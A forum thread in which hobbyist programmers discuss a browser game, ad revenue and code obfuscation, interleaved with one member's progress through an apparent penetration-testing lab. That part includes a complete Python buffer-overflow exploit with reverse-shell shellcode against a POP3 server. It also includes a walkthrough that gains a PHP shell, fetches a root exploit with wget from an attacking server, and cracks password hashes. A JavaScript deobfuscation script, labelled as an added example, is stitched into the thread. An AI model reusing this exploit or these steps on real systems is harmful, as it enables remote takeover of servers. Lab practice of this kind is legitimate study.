At 5/25/15 10:05 AM, FlyingColours wrote: Added SFX to Xirang!
Careful when you go from Ghost Torture Pass to the Yin Mountains! You may get a heart attack.
Sounds like you need to tone the volume down lol.
At 5/25/15 10:46 AM, MSGhero wrote:
At 5/25/15 10:05 AM, FlyingColours wrote: Added SFX to Xirang!
Careful when you go from Ghost Torture Pass to the Yin Mountains! You may get a heart attack.
Sounds like you need to tone the volume down lol.
Awww.... I love it though! It happens at the exact moment where the loading doors open to reveal a gate, and is totally Hollywoody... It even matches the Beethoven in the background!
You know, do you guys think it's good enough for Tom to sponsor it?
(Flashads don't work in the game, obviously...)
I'll be very happy to put up huge Tankman posters on the loading screen (which appears whenever the player changes location), and I'm working on adding medals.
At 5/25/15 11:19 AM, FlyingColours wrote: You know, do you guys think it's good enough for Tom to sponsor it?
(Flashads don't work in the game, obviously...)
I think you still get preroll and page ads.
At 5/25/15 11:49 AM, MSGhero wrote:
At 5/25/15 11:19 AM, FlyingColours wrote: You know, do you guys think it's good enough for Tom to sponsor it?
(Flashads don't work in the game, obviously...)
I think you still get preroll and page ads.
They seem to be much less effective than in-game adverts though...
Since you have had games frontpaged before, do you think that is the case?
#!/usr/bin/python
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
overflow = "\x90" * 2606 # Create the buffer overflow
EIP = "\x8F\x35\x4A\x5F" # JMP ESP in SLMFC.dll (x86, little endian)
swap = "\x90" * 16 # Stack space for decoding
shell = ("\xdd\xc0\xb8\x6f\x1b\x9d\x92\xd9\x74\x24\xf4\x5a\x2b\xc9" +
"\xb1\x4f\x31\x42\x19\x83\xea\xfc\x03\x42\x15\x8d\xee\x61" +
"\x7a\xd8\x11\x9a\x7b\xba\x98\x7f\x4a\xe8\xff\xf4\xff\x3c" +
"\x8b\x59\x0c\xb7\xd9\x49\x87\xb5\xf5\x7e\x20\x73\x20\xb0" +
"\xb1\xb2\xec\x1e\x71\xd5\x90\x5c\xa6\x35\xa8\xae\xbb\x34" +
"\xed\xd3\x34\x64\xa6\x98\xe7\x98\xc3\xdd\x3b\x99\x03\x6a" +
"\x03\xe1\x26\xad\xf0\x5b\x28\xfe\xa9\xd0\x62\xe6\xc2\xbe" +
"\x52\x17\x06\xdd\xaf\x5e\x23\x15\x5b\x61\xe5\x64\xa4\x53" +
"\xc9\x2a\x9b\x5b\xc4\x33\xdb\x5c\x37\x46\x17\x9f\xca\x50" +
"\xec\xdd\x10\xd5\xf1\x46\xd2\x4d\xd2\x77\x37\x0b\x91\x74" +
"\xfc\x58\xfd\x98\x03\x8d\x75\xa4\x88\x30\x5a\x2c\xca\x16" +
"\x7e\x74\x88\x37\x27\xd0\x7f\x48\x37\xbc\x20\xec\x33\x2f" +
"\x34\x96\x19\x38\xf9\xa4\xa1\xb8\x95\xbf\xd2\x8a\x3a\x6b" +
"\x7d\xa7\xb3\xb5\x7a\xc8\xe9\x01\x14\x37\x12\x71\x3c\xfc" +
"\x46\x21\x56\xd5\xe6\xaa\xa6\xda\x32\x7c\xf7\x74\xed\x3c" +
"\xa7\x34\x5d\xd4\xad\xba\x82\xc4\xcd\x10\xb5\xc3\x5a\x5b" +
"\x6e\xc5\x47\x33\x6d\xd9\x76\x7f\xf8\x3f\x12\x6f\xad\xe8" +
"\x8b\x16\xf4\x62\x2d\xd6\x22\xe2\xce\x45\xa9\xf2\x99\x75" +
"\x66\xa5\xce\x48\x7f\x23\xe3\xf3\x29\x51\xfe\x62\x11\xd1" +
"\x25\x57\x9c\xd8\xa8\xe3\xba\xca\x74\xeb\x86\xbe\x28\xba" +
"\x50\x68\x8f\x14\x13\xc2\x59\xca\xfd\x82\x1c\x20\x3e\xd4" +
"\x20\x6d\xc8\x38\x90\xd8\x8d\x47\x1d\x8d\x19\x30\x43\x2d" +
"\xe5\xeb\xc7\x5d\xac\xb1\x6e\xf6\x69\x20\x33\x9b\x89\x9f" +
"\x70\xa2\x09\x15\x09\x51\x11\x5c\x0c\x1d\x95\x8d\x7c\x0e" +
"\x70\xb1\xd3\x2f\x51") # msfpayload windows/shell_reverse_tcp LHOST=192.168.14.221 LPORT=443 R | msfencode -b "\x00\x0a\x0d" -e x86/shikata_ga_nai
padding = "\x90" * (3500 - 2606 - 4 - 16 - 341) # Stack padding, 3500 bytes total - buffer overflow - EIP - swap space - shell payload
try:
    print "\nSending buffer.."
    s.connect(("192.168.15.70", 110))
    data = s.recv(1024)
    s.send("USER username\r\n")
    data = s.recv(1024)
    s.send("PASS " + overflow + EIP + swap + shell + padding + "\r\n")
    print "Done!"
except:
    print "Could not connect!"
I rode a buffer overflow into a reverse shell with python, I feel kinda badass :D
Programming stuffs (tutorials and extras)
PM me (instead of MintPaw) if you're confuzzled.
thank Skaren for the sig :P
At 5/25/15 12:10 PM, FlyingColours wrote: Since you have had games frontpaged before, do you think that is the case?
At 43k portal ads each and 139/68k flash ads and 2.5/10k preroll ads, flash ads have portal ads beat by only $10. Portal ads have the biggest ecpm (>$4), flash ads have less than half, and preroll are like 2/3 3/4 portal ads.
At 5/25/15 03:42 PM, MSGhero wrote:
At 5/25/15 12:10 PM, FlyingColours wrote: Since you have had games frontpaged before, do you think that is the case?
At 43k portal ads each and 139/68k flash ads and 2.5/10k preroll ads, flash ads have portal ads beat by only $10. Portal ads have the biggest ecpm (>$4), flash ads have less than half, and preroll are like 2/3 3/4 portal ads.
Ah, I see. They're not so bad then.
Also, I think I'm gonna put up links to my userpage and gain a little from that.
By the way, do you think I should obfuscate the code before I publish?
I'm not sure why anyone would steal my code though. Some of the code I added late in the development process is pretty spaghetti 'cos I know I'll rewrite the engine if I make a sequel.
At 5/25/15 09:21 PM, FlyingColours wrote: By the way, do you think I should obfuscate the code before I publish?
I'm not sure how js works, but it's not worth it for flash. No one really cares about your code. I guess it wouldn't hurt. Haxe's output is a terrible thing to look through on any platform... people who encounter obfuscated code would probably quit after 45 seconds.
Security through obscurity is not security at all.
At 5/25/15 09:21 PM, FlyingColours wrote: By the way, do you think I should obfuscate the code before I publish?
Yes. Minify it, too.
At 5/26/15 04:30 AM, egg82 wrote: Security through obscurity is not security at all.
Why not? It's certainly not the best, but it definitely secures your code from at least a portion of people and, considering no security method is 100% effective, the fact it does something at the very least makes it a security measure.
It's your best (and as far as I can think, only) for client side JavaScript.
Okay... If Sam says to do it, then I'll do it.
Of course I'm going to minify! I have to make up for that embarrassing code copy-pasting that I don't want anyone to know about.
Speaking of which, I'll have to fix two minor bugs, add in volume control, add the Tankman posters anyway, make fancy scrollbars and possibly a fancy cursor, test the remaining medals, and I'm all set. Probably.
What do you think about the icon?
Edit: Wow, I can edit now! This is such a touching moment.
At 5/26/15 08:14 AM, Sam wrote: Why not? It's certainly not the best, but it definitely secures your code from at least a portion of people and, considering no security method is 100% effective, the fact it does something at the very least makes it a security measure.
It's your best (and as far as I can think, only) for client side JavaScript.
Most decompilers have built-in deobf for many common languages.
Also you can just use debuggers..
Or, ya know, not. Because some 16-year-old's game code isn't worth it unless there's MySQL information hardcoded in there or something. In which case, we're back to deobf and some quick string searches. (though honestly you wouldn't need deobf for that)
If you want to screw with JS, there's easier ways as well.
Obfuscation offers a weak solution to a (virtually) nonexistent problem.
At 5/27/15 01:13 AM, egg82 wrote: Obfuscation offers a weak solution to a (virtually) nonexistent problem.
It takes a grand total of 30 seconds to paste your code into an obfuscator. The trade off is worth it, in almost every case. Out of interest, I looked up a "deobfuscator", ripped their source, obfuscated it, and then used their tool to deobfuscate:
Original Source
Obfuscated -> Deobfuscated
I realise some may be better than others and the method of obfuscation affects the output, but I certainly wouldn't want to trawl through that code to find something. It at least deters a group of people from having access to your source code in a readable and usable format.
Basically, I see no reason not to.
At 5/27/15 01:13 AM, egg82 wrote: Most decompilers have built-in deobf for many common languages.
Also you can just use debuggers..
Or, ya know, not. Because some 16-year-old's game code isn't worth it
Actually, I'm 17 now and will be 18 in a few months. I've grown :P
unless there's MySQL information hardcoded in there or something. In which case, we're back to deobf and some quick string searches. (though honestly you wouldn't need deobf for that)
Why would anyone do that in JS?
At 5/27/15 07:19 AM, Sam wrote: Original Source
Obfuscated -> Deobfuscated
You forgot the unescape option, which turns the top array of hex values into this:
var _0xc5a6 = ["", "space_after_anon_function", "jslint_happy", "braces_on_own_line", "expand", "collapse", "brace_style", "indent_size", "indent_char", " ", "preserve_newlines", "undefined", "max_preserve_newlines", "keep_array_indentation", "space_before_conditional", "indent_case", "length", "pop", "\x0A", "\x0D", "replace", "indexOf", "substring", "push", "eat_next_space", "mode", "if_line", "indentation_level", "var_line", "var_line_reindented", "case_body", "TK_COMMENT", "BLOCK", "[EXPRESSION]", "[INDENTED-EXPRESSION]", "(EXPRESSION)", "(FOR-EXPRESSION)", "(COND-EXPRESSION)", "DO_BLOCK", "previous_mode", "charAt", "case", "return", "do", "if", "throw", "else", "TK_EOF", "\x09", "indentation_baseline", "match", "-", "+", "TK_WORD", "in", "TK_OPERATOR", "TK_EQUALS", "var", "(", "[", "TK_START_EXPR", ")", "]", "TK_END_EXPR", "{", "TK_START_BLOCK", "}", "TK_END_BLOCK", ";", "TK_SEMICOLON", "/", "*", "/*", "*/", "TK_INLINE_COMMENT", "TK_BLOCK_COMMENT", "\'", "\"", "\\", "TK_STRING", "#", "!", "=", "[]", "{}", "<", "<!--", "in_html_comment", "-->", "TK_UNKNOWN", "split", "\x0A\x0D\x09 ", "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_$", "0123456789", "+ - * / % & ++ -- = += -= *= /= %= == === != !== > < >= <= >> << >>> >>>= >>= <<= && &= | || ! !! , : ? ^ ^= |= ::", ",", "continue,try,throw,return,var,if,switch,case,default,for,while,break,function", "for", "while", ".", "function", "typeof", "catch", "expand-strict", "default", "in_case_statement", ":", "in_case", "NONE", "toLowerCase", "finally", "NEWLINE", "end-expand", "SPACE", "get", "set", "new", "var_line_tainted", "OBJECT", "::", "--", "++", "ternary_depth", "?", "slice", "join", "js_beautify", "value", "text", "getElementById", "eval", "write", "writeln", "createPopup", "createElement", "Syntax Error:\x0A", "message", "alert", "Paste code here...", "script"];
You can then make a quick script that gets the values from that array and puts them back into whatever variables are using them. Then if you want to you can modify the function variables to be just x2, x3, etc. instead of _0xeed0x2, _0xeed0x3, etc. It'll be much easier to read, then.
Again, assuming you want to put the effort into it. If you don't, then you didn't really want to do it in the first place.
True, though. I suppose if it only takes a minute then go for it. Just don't lose your source code or you'll get to go back through your obfuscated AND decompiled code.
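The cleanup described in the post above (put the table's strings back where they are used, then shorten the generated names), as an added example that is not part of the original thread. The function names and the sample input are constructed for illustration; the source under analysis is only pattern-matched, never evaluated.

```javascript
// Added example: inline an obfuscator's string table without running the code.
// Assumes one `var _0x.... = ["...", ...];` table that holds only string literals.
function decodeLiteral(body) {
  const simple = { n: "\n", r: "\r", t: "\t", b: "\b", f: "\f", v: "\v", 0: "\0" };
  return body.replace(/\\(x[\da-fA-F]{2}|u[\da-fA-F]{4}|[\s\S])/g, (m, esc) => {
    if (esc.length > 1) return String.fromCharCode(parseInt(esc.slice(1), 16));
    return esc in simple ? simple[esc] : esc; // \" \' \\ decode to the character itself
  });
}

function inlineStringTable(source) {
  const STR = String.raw`"(?:[^"\\]|\\.)*"|'(?:[^'\\]|\\.)*'`;
  const decl = new RegExp(
    String.raw`var\s+(_0x[\da-f]+)\s*=\s*\[\s*((?:(?:${STR})\s*(?:,\s*)?)*)\]\s*;?`
  ).exec(source);
  if (!decl) return { code: source, strings: [] };
  const [whole, name, items] = decl;
  // 1. Collect the table entries as decoded strings (regex only, no eval).
  const strings = [];
  const lit = /"((?:[^"\\]|\\.)*)"|'((?:[^'\\]|\\.)*)'/g;
  for (let m; (m = lit.exec(items)); ) strings.push(decodeLiteral(m[1] ?? m[2]));
  // 2. Drop the table and replace each constant lookup _0xNAME[i] with its literal.
  let code = source.replace(whole, "").replace(
    new RegExp(name + String.raw`\[(\d+)\]`, "g"),
    (m, i) => (Number(i) < strings.length ? JSON.stringify(strings[Number(i)]) : m)
  );
  // 3. Shorten generated identifiers (_0xeed0x2 -> x2), avoiding names already in use.
  const taken = new Set(code.match(/[A-Za-z_$][\w$]*/g));
  const renamed = new Map();
  code = code.replace(/\b_0x[\da-f]+x([\da-f]+)\b/g, (m, n) => {
    let short = renamed.get(m) || "x" + n;
    while (!renamed.has(m) && taken.has(short)) short += "_";
    taken.add(short);
    renamed.set(m, short);
    return short;
  });
  return { code: code.trim(), strings };
}

// Constructed sample in the style of the obfuscated output discussed above.
const SAMPLE = String.raw`var _0xc5a6 = ["\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64", "\x76\x61\x6C\x75\x65", "\x0A"];
function show(_0xeed0x2) {
  var _0xeed0x3 = document[_0xc5a6[0]](_0xeed0x2);
  return _0xeed0x3[_0xc5a6[1]] + _0xc5a6[2];
}`;
console.log(inlineStringTable(SAMPLE).code);
```

Lookups with a computed index, and tables that are rotated or decoded at runtime, are left untouched by this pass.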
Phoenix down!
Web fuzzer got robots.txt
Manually opened robots.txt to discover hidden /internal directory
View->Source to discover web page is a custom front-end for a system called "Advanced Comment System"
Google search revealed remote code execution exploit
Got PHP shell with apache permissions
uname showed kernel version compatible with 2009-2692 local privilege escalation exploit and fstab showed executable /tmp directory
compiled c executable on attacking machine, hosted on attacking http server, and wget to /tmp
executed, root acquired
Ka-boom.
The programmer in me is cringing at all the code I smashed into 8 bytes of memory
At 6/4/15 05:05 PM, CodeCrunch wrote: http://www.scribd.com/doc/228831637/Optimal-Tip-to-Tip-Efficiency
The hell did I just read.. ?
At 6/4/15 05:05 PM, CodeCrunch wrote: http://www.scribd.com/doc/228831637/Optimal-Tip-to-Tip-Efficiency
That's a... rather elaborate joke.
At 6/4/15 05:05 PM, CodeCrunch wrote: http://www.scribd.com/doc/228831637/Optimal-Tip-to-Tip-Efficiency
Wasn't this joke in a film?
At 6/7/15 04:20 PM, Sam wrote: Wasn't this joke in a film?
"Zack and Miri Make a Porno" I think
Same movie that had the "Double-Dutch Rudder"?
Don't ask me how I know this
At 6/7/15 04:20 PM, Sam wrote:
At 6/4/15 05:05 PM, CodeCrunch wrote: http://www.scribd.com/doc/228831637/Optimal-Tip-to-Tip-Efficiency
Wasn't this joke in a film?
It was from the finale of the first season of Silicon Valley.
Another one bites the dust. Alice is mine.
Simple buffer overflow from CVE-2003-0352. I should have seen that coming, I spent way too much time dinking around with the open terminal service port.
I did find a password-protected "bank-account.zip" on the C drive while I was looking for my "proof.txt" file. I downloaded that and I'll take a closer look at it after I decrypt the NT password hashes on the system.
Decrypted NTLM via online resource.
Not the password for the zip, though. Looks like I'll need to try to pop it open.
Broken password via my 980.
Yeah, should've seen that one coming as well. I swear I tried that one earlier, though.
Oh, what's this?
Where's that machine named "bob" again? I've got an idea of what that password might be.
Bob, you're a giant pain in my ass.
Spent almost 12 hours attacking this one machine. I got in, but who knew privilege escalation on an XP machine with SP1 on it would be such a massive pain. Plenty of "local root" exploits for SP2 or 3, and I even found a service execution exploit that let me run things as SYSTEM/LocalService but every time I get a meterpreter running on that it dies in a few seconds.
I feel like the service I'm replacing is restarting because it's not a valid service executable.
Ughhh....
Also, the hell am I doing with that password I found on Alice? Should I log into the MASTER system with it?
BOB, WHY DO YOU HATE EVERY FIBER OF MY BEING
AAAAAAAAAAAAAAHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHH
New target. Fuck it, bob can have his stupid computer
https://egg82.ninja/
Any thoughts?
Not quite done yet. It's all custom written. I could have just used Wordpress, but meh.
Also I has PGP key. I feel special now :3
At 6/18/15 04:29 AM, egg82 wrote: https://egg82.ninja/
Any thoughts?
Not quite done yet. It's all custom written. I could have just used Wordpress, but meh.
Also I has PGP key. I feel special now :3
Cool! A .ninja TLD? :O
At 6/21/15 03:42 PM, CodeCrunch wrote: What do when openfl can't tell me where in my code there's a problem and points to itself instead?
What target are you exporting to?
My first guess is the last line in the screencap, "invalid *". This happens to me in neko when I don't initialize all my numbers, assuming they'll default to 0 like in flash. It's either null or undefined or NaN or something, and you can't multiply those, and it crashes.
Second guess is update openfl and lime to the latest master versions and try again. If you just did, maybe reinstall them bc sometimes they'll release a fix without telling anyone or updating the version number.
god why do games take so long to make when you actually want to charge money for them
anyway ITS HAPPENING
https://www.youtube.com/watch?v=pNafa98gXO4